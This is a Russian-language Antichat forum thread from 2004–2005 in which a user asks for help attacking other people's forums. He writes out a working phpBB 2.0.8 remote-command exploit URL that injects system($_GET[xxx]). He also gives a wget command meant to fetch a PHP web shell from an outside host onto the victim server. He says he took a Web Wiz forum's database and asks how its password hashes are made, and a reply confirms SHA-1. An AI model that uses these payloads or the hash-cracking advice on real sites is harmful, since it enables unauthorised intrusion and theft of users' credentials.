ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Пара вопросов по Phpbb 2.0.8 и форуму Web Wiz
  #1  
Старый 28.12.2004, 16:09
Аватар для R!ikoSHeTT
R!ikoSHeTT
Новичок
Регистрация: 27.12.2004
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию Пара вопросов по Phpbb 2.0.8 и форуму Web Wiz

Прошу прощение за небольшое повторение, у меня 2 проблемы:

1. Есть форум на дырявом движке PHPBB 2.0.8
Эксплойт для SQL Injection прокатывает. Вот он:

www.victim.ru/forum/viewtopic.php?xxx=/*здесь команда*/&p=12&highlight=%2527.system($_GET[xxx]).include%2527

Так вот, работает большинство команд (ls выдает содержимое, pwd говорит мне о моем месторасположении), однако невозможно закачать шелл с сайта (допустим, http://myshell.narod.ru/shell.php)
т.е. я набираю в браузере

viewtopic.php?xxx=wget http://myshell.narod.ru/shell.php&p=12&highlight=%2527.system($_GET[xxx]).include%2527

Затем, обращаюсь к шеллу:

www.victim.ru/forum/shell.php

и получаю ошибку 404. Нет такого файла на сервере.

Такая ситуация встретилась на двух серверах. Обе машины под управлением FreeBSD, о чем говорит uname.

С чем это может быть связано, и может, кто-то сможет мне указать на ошибки в эксплуатации этой уязвимости))

2. Удалось скачать базу данных с одного форума от web wiz 2.0.7
(/admin/database/wwForum.mdb)
Каким алгоритмом хешируются пароли в этой базе? Есть подозрение, что это SHA-1, так как PasswordPRO наиболее корректно отображает хеши из базы именно, как SHA-1 хеши. Это так?
 
Ответить с цитированием

  #2  
Старый 13.01.2005, 08:53
Аватар для ProTeuS
ProTeuS
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592

Репутация: 2175


Отправить сообщение для ProTeuS с помощью ICQ
По умолчанию

Цитата:
Сообщение от R!ikoSHeTT  
2. Удалось скачать базу данных с одного форума от web wiz 2.0.7
(/admin/database/wwForum.mdb)
Каким алгоритмом хешируются пароли в этой базе? Есть подозрение, что это SHA-1, так как PasswordPRO наиболее корректно отображает хеши из базы именно, как SHA-1 хеши. Это так?
Да, это SHA-1. А с 4его ты взял, 4то PP коректно с ними работает? он только с md4,md5 и мускульными хэшами работает!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
6 лет пользовался - вчера угнали - пара вопросов vlasyuk ICQ 25 22.10.2005 14:55
Вопрос про эксплоит на форуме phpbb 2.0.8 dyx Форумы 2 12.04.2005 00:12
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25
Xss в phpBB 2.0.8 Форумы 2 06.08.2004 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ